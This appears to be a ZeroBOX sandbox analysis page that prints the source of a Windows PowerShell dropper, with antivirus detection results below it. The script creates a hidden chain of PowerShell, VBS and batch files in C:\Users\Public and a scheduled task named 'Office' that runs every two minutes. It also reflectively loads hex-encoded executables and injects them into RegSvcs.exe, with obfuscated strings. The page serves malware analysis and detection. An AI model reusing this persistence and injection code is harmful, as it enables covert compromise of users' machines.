popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$Content = @'
<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<TimeTrigger>
<Repetition>
<Interval>PT2M</Interval>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary>2023-01-01T00:00:00</StartBoundary>
<Enabled>true</Enabled>
</TimeTrigger>
</Triggers>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<StartWhenAvailable>true</StartWhenAvailable>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>false</Hidden>
</Settings>
<Actions Context="Author">
<Exec>
<Command>wscript.exe</Command>
<Arguments>"C:\Users\Public\Smart.vbs"</Arguments>
</Exec>
</Actions>
</Task>
[IO.File]::WriteAllText("C:\Users\Public\smart.xml", $Content)
$Content = @'
function Func1{param($p1);$p1=$p1-split"(..)"|?{$_};ForEach($p2 in $p1){[Convert]::ToInt32($p2,16)}}
$Serv = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300766A7A640000000000000000E00002010B01080000FC0000000A0000000000005E1A01000020000000200100000040000020000000020000040000000000000004000000000000000060010000020000000000000200608500001000001000000000100000100000000000001000000000000000000000000C1A01004F00000000200100FF07000000000000000000000000000000000000004001000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000064FA00000020000000FC000000020000000000000000000000000000200000602E72737263000000FF070000002001000008000000FE0000000000000000000000000000400000402E72656C6F6300000C0000000040010000020000000601000000000000000000000000004000004200000000000000000000000
}catch{}
$pppE = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300061A42F00000000000000000E0000E210B013000004602000006000000000000AE65020000200000008002000000400000200000000200000400000000000000040000000000000000C002000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000606502004B00000000800200140300000000000000000000000000000000000000A002000C000000156502001C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E74657874000000B4450200002000000046020000020000000000000000000000000000200000602E7273726300000014030000008002000004000000480200000000000000000000000000400000402E72656C6F6300000C00000000A0020000020000004C0200000000000000000000000000400000420000000000000000000000
}catch{}
[Byte[]] $Ziad = Func1 $bhpi
[Byte[]] $pppE1 = Func1 $pppE
[Byte[]] $Serv1 = Func1 $Serv
}catch{}
}catch{}
$ErrorActionPreference = "Stop"
$arg4 = [Ref].Assembly::Load($pppE1).
GetType("NewPE2.PE").
GetMethod("Execute")
$part1 = 'C:\Win'
$part2 = 'dows\M'
$part3 = 'icrosoft.NET\F'
$part4 = 'ramework\v'
$part5 = '4.0.30319\R'
$part6 = 'egSvc'
$part7 = 's.exe'
$fullPath = $part1 + $part2 + $part3 + $part4 + $part5 + $part6 + $part7
$arg5 = [object[]]($fullPath, $Serv1)
$arg6 = $arg4.
Invoke($null, $arg5)
catch {
Write-Host "Error: $_"
[IO.File]::WriteAllText("C:\Users\Public\Smart.ps1", $Content)
Sleep 1
$Content = @'
on error resume next
Dim s6862
Dim s6863
Dim s6864
Dim s6865
Dim s6866
Dim s6867
Dim s6868
Dim s6869
Dim s6870
Dim s6871
Dim s6872
Dim s6873
Dim s6874
Dim s6875
Dim s6876
Dim s6877
Dim s6878
Dim s6879
Dim s6880
Dim s6881
Dim s6882
Dim s6883
Dim s6884
Dim s6885
Dim s6886
Dim s6887
Dim s6888
Dim s6889
Dim s6890
Dim s6891
Dim s6892
Dim s6893
Dim s6894
Dim s6895
Dim s6896
Dim s6897
Dim s6898
Dim s6899
Dim s6900
Dim s6901
Dim s6902
Dim s6903
Dim s6904
on error resume next
VLC = "WSc%.#ll"
Object1 = Replace(VLC,"#","She")
Set WS = CreateObject(Replace(Object1,"%","ript"))
WN = ChrW("4"+"8")
WS.Run "C:\Users\Public\Smart.bat" ,0
[IO.File]::WriteAllText("C:\Users\Public\Smart.vbs", $Content)
$Content = @'
CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\Users\Public\Smart.ps1"
[IO.File]::WriteAllText("C:\Users\Public\Smart.bat", $Content)
%public%;schtasks /Create /XML $env:PUBLIC\smart.xml /TN 'Office'
Antivirus Signature
Bkav Clean
Lionic Clean
Cynet Malicious (score: 99)
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Agent.BAG
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Win32.Trojan.Pshell.Yylw
Sophos Clean
F-Secure Trojan.TR/PShell.Krypt.VPH
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Emsisoft Clean
Ikarus Trojan-Dropper.PowerShell.Agent
Jiangmin Clean
Avira TR/PShell.Krypt.VPH
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
MAX Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Clean
Panda Clean
No IRMA results available.